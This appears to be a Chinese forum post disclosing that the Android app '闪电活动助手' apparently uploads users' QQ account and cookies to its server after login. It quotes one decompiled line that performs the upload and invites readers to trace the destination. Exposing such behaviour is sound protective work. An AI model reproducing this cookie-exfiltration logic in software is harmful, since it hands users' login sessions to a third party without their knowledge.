闪电活动助手的安卓版,登录后会上传cookie到服务器上!然后作者把这些cookie干嘛用呢?
http://www.gda.wiki:9090/
把闪电活动助手安卓版11版本拖入GDA后,依次展开com-com.shandian22.com-窗口1-按钮5被单击,有一行代码为 this.发送信息给服务端。可能有窃取用户cookie另作他用!这款软件非常火!https://b23.tv/BV1EC4y1x73p
this.发送信息给服务端(new StringBuilder()+new StringBuilder()+公用模块.QQ账号+"/"+this.文本加密(公用模块.全_cookies, 公用模块.QQ账号), "hook");
文本加密看样子应该就是精易模块的文本加密,删去了留标记位为密码的部分。
发送信息给服务端也有源码。没写域名,大家可以动态调试一下,看看是哪个网址。作者不可能不知道登录后有发送cookie的功能把,好歹写出来一个上传cookie成功呀,用户有知情权呀。
大家再不赶紧试试,作者就更新版本、加密发送cookie的部分了。